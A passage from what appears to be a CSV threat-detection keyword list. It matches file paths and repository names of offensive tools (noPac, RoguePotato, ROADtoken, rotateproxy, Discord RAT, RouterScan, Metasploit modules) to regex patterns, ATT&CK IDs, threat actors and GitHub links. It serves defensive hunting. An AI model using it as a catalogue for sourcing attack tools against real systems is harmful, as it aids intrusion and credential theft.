Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10474" "*/ricardojba/Invoke-noPac*",".{0,1000}\/ricardojba\/Invoke\-noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","N/A","1","62","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z","10475" "*/ricardojba/noPac*",".{0,1000}\/ricardojba\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","1","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","10476" "*/rid_hijack.*",".{0,1000}\/rid_hijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10477" "*/rid_hijack.py*",".{0,1000}\/rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","10478" "*/ridenum/ridenum.py*",".{0,1000}\/ridenum\/ridenum\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","10479" "*/RID-Hijacking.git*",".{0,1000}\/RID\-Hijacking\.git.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","10480" "*/Ridter/noPac*",".{0,1000}\/Ridter\/noPac.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - 
TA0002","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","1","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","10481" "*/RITM.git*",".{0,1000}\/RITM\.git.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","1","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","10482" "*/rlogin-brute.nse*",".{0,1000}\/rlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10483" "*/rm_injection.exe*",".{0,1000}\/rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10484" "*/rmi-dumpregistry.nse*",".{0,1000}\/rmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10485" "*/rmi-vuln-classloader.nse*",".{0,1000}\/rmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10486" "*/ROADToken.exe*",".{0,1000}\/ROADToken\.exe.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","10489" "*/ROADtoken.git*",".{0,1000}\/ROADtoken\.git.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","10490" 
"*/ROADtools/*",".{0,1000}\/ROADtools\/.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","1","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","10491" "*/roaster.py*",".{0,1000}\/roaster\.py.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","#linux","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","10492" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10493" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10494" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10495" 
"*/RoguePotato.git*",".{0,1000}\/RoguePotato\.git.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","10496" "*/RogueWinRM.git*",".{0,1000}\/RogueWinRM\.git.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","10497" "*/RogueWinRMdll*",".{0,1000}\/RogueWinRMdll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10498" "*/RogueWinRMexe*",".{0,1000}\/RogueWinRMexe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10499" "*/root/.gs_with_tor*",".{0,1000}\/root\/\.gs_with_tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","10500" "*/root/.local/bin/spraycharles*",".{0,1000}\/root\/\.local\/bin\/spraycharles.{0,1000}","offensive_tool_keyword","spraycharles","Low and slow password spraying tool","T1110.003 - T1110.001","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Tw1sm/spraycharles","1","0","#linux","N/A","10","2","195","32","2025-02-09T03:08:09Z","2018-09-17T11:17:47Z","10501" "*/root/.mozilla/firefox/*.Exegol*",".{0,1000}\/root\/\.mozilla\/firefox\/.{0,1000}\.Exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","10502" 
"*/root/dns2tcp*",".{0,1000}\/root\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","10503" "*/root/lsarelayx*",".{0,1000}\/root\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","#linux","N/A","10","6","562","69","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z","10505" "*/root/output/ratchatPT*",".{0,1000}\/root\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","#linux","risk of False positive","10","10","16","6","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z","10506" "*/root/shellcode.c*",".{0,1000}\/root\/shellcode\.c.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","#linux","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","10507" "*/root/shellcode.cpp*",".{0,1000}\/root\/shellcode\.cpp.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","#linux","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","10508" "*/root/shellcode.exe*",".{0,1000}\/root\/shellcode\.exe.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - 
T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","#linux","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","10509" "*/root/viper/*",".{0,1000}\/root\/viper\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","10511" "*/root/viper/dist*",".{0,1000}\/root\/viper\/dist.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","#linux","N/A","10","","N/A","","","","10512" "*/rootkit.dll*",".{0,1000}\/rootkit\.dll.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","1","N/A","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","10513" "*/rootkiter/Binary-files*",".{0,1000}\/rootkiter\/Binary\-files.{0,1000}","offensive_tool_keyword","Termite","Termite 
rootkit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","10514" "*/rop_emporium*",".{0,1000}\/rop_emporium.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","1","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","10515" "*/ropbuffers.go*",".{0,1000}\/ropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","10516" "*/ropfuscator*",".{0,1000}\/ropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","N/A","5","426","32","2024-05-08T20:06:11Z","2021-11-16T18:13:57Z","10517" "*/rotateproxy.exe*",".{0,1000}\/rotateproxy\.exe.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10518" 
"*/rotateproxy.git*",".{0,1000}\/rotateproxy\.git.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10519" "*/rotateproxy.service*",".{0,1000}\/rotateproxy\.service.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10520" "*/rotateproxy/releases/*",".{0,1000}\/rotateproxy\/releases\/.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10521" "*/rotateproxy_*.zip*",".{0,1000}\/rotateproxy_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10522" "*/rotateproxy-darwin-*",".{0,1000}\/rotateproxy\-darwin\-.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","1","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10523" "*/rotateproxy-linux*",".{0,1000}\/rotateproxy\-linux.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10524" "*/rotateproxy-windows*",".{0,1000}\/rotateproxy\-windows.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","10525" "*/rottenpotato*",".{0,1000}\/rottenpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Turla - Volatile Cedar - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","10526" "*/RottenPotatoNG.git*",".{0,1000}\/RottenPotatoNG\.git.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","10527" "*/Rottie3.exe*",".{0,1000}\/Rottie3\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","10528" "*/Routerscan.7z*",".{0,1000}\/Routerscan\.7z.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10529" 
"*/RouterScan.exe*",".{0,1000}\/RouterScan\.exe.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10530" "*/router-scan.git*",".{0,1000}\/router\-scan\.git.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10531" "*/RouterScan.log*",".{0,1000}\/RouterScan\.log.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#linux","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","10532" "*/rpc/rpcproxy.dll?*",".{0,1000}\/rpc\/rpcproxy\.dll\?.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10533" "*/rpcap-brute.nse*",".{0,1000}\/rpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","10534" "*/rpcap-info.nse*",".{0,1000}\/rpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
